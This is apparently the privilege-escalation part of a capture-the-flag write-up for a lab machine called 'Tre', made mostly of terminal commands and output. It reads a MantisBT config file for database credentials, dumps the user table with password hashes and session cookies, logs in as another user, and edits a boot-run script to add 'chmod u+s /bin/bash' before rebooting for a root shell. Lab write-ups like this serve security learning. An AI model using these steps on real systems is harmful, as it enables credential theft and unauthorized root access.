Priv Esc

www-data@tre:/var/www/html/mantisbt$ find / -name config_inc.php 2>/dev/null
find / -name config_inc.php 2>/dev/null
/var/www/html/system/config/config_inc.php
/var/www/html/mantisbt/config/config_inc.php
www-data@tre:/var/www/html/mantisbt$ cat /var/www/html/mantisbt/config/config_inc.php
<t$ cat /var/www/html/mantisbt/config/config_inc.php
<?php
$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'mantis';
$g_db_username            = 'mantissuser';
$g_db_password            = 'password@123AS';

$g_default_timezone       = 'America/New_York';

$g_crypto_master_salt     = 'uuvODlMDm11FeEgAJ5Fqo9Nmswufd5ELmgJkEuQGvGA=';
mantissuser:password@123AS
www-data@tre:/dev/shm$ mysql -u mantissuser -p 
mysql -u mantissuser -p
Enter password: password@123AS

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 536
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mantis             |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use mantis;
use mantis;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mantis]> show tables;
show tables;
+-----------------------------------+
| Tables_in_mantis                  |
+-----------------------------------+
| mantis_bug_file_table             |
| mantis_bug_history_table          |
| mantis_bug_monitor_table          |
| mantis_bug_relationship_table     |
| mantis_bug_revision_table         |
| mantis_bug_table                  |
| mantis_bug_tag_table              |
| mantis_bug_text_table             |
| mantis_bugnote_table              |
| mantis_bugnote_text_table         |
| mantis_category_table             |
| mantis_config_table               |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table  |
| mantis_custom_field_table         |
| mantis_email_table                |
| mantis_filters_table              |
| mantis_news_table                 |
| mantis_plugin_table               |
| mantis_project_file_table         |
| mantis_project_hierarchy_table    |
| mantis_project_table              |
| mantis_project_user_list_table    |
| mantis_project_version_table      |
| mantis_sponsorship_table          |
| mantis_tag_table                  |
| mantis_tokens_table               |
| mantis_user_pref_table            |
| mantis_user_print_pref_table      |
| mantis_user_profile_table         |
| mantis_user_table                 |
+-----------------------------------+
31 rows in set (0.001 sec)

MariaDB [mantis]> select * from mantis_user_table;
select * from mantis_user_table;
+----+---------------+---------------+----------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
| id | username      | realname      | email          | password                         | enabled | protected | access_level | login_count | lost_password_request_count | failed_login_count | cookie_string                                                    | last_visit | date_created |
+----+---------------+---------------+----------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
|  1 | administrator | administrator | root@localhost | 5f4dcc3b5aa765d61d8327deb882cf99 |       1 |         0 |           90 |          42 |                           0 |                  0 | x-WZQzXvLVwezZq8FEhZYau0yBQCvhVWrmh2v9J-RVpgCK5qYdIquwQzGBbs8uLG | 1722909171 |            1 |
|  2 | tre           | Tr3@123456A!  | tre@localhost  | 64c4685f8da5c2225de7890c1bad0d7f |       1 |         0 |           70 |           0 |                           0 |                  0 | bp9uP3SY4tyKMFHSytb2RyecV5fPrsvGjb4sLboLkoyodEPn0NbZID9GhRURGAvf | 1589263108 |   1589263108 |
|  3 | adot8         |               | [email protected] | b5a0c4dbacce8bd078979d1a469684ac |       1 |         0 |           25 |           0 |                           0 |                  1 | elLBNVW12UEebUPLdJnCxI_TpHbi-v9y6XtID4Z_5dKVlicN6JLtz04pxGOrPTGw | 1722903613 |   1722903613 |
+----+---------------+---------------+----------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
3 rows in set (0.000 sec)

MariaDB [mantis]> 
tre:Tr3@123456A!
tre@tre:/var/www/html/mantisbt$ sudo -l
sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown
vi  /usr/bin/check-system
chmod u+s /bin/bash
sudo /sbin/shutdown -r now
